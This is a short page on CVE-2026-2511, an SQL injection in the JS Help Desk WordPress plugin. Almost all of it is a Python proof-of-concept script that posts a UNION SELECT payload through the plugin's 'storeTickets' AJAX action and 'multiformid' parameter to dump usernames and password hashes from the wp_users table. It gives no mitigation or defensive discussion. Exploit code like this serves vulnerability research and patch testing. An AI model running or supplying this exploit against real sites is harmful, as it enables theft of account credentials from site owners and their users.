CVE-2026-2511: JS Help Desk插件SQL注入

import requests # Target URL (example) target_url = "http://example.com/wp-admin/admin-ajax.php" # Payload exploiting the lack of quotes in SQL query # Using integer-based injection to bypass esc_sql() payload = "1 UNION SELECT 1, user_login, user_pass FROM wp_users-- -" data = { "action": "storeTickets", # The vulnerable action/function "multiformid": payload # The vulnerable parameter } try: response = requests.post(target_url, data=data) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Response:") print(response.text) else: print("[-] Request failed with status code:", response.status_code) except Exception as e: print(f"[-] An error occurred: {e}")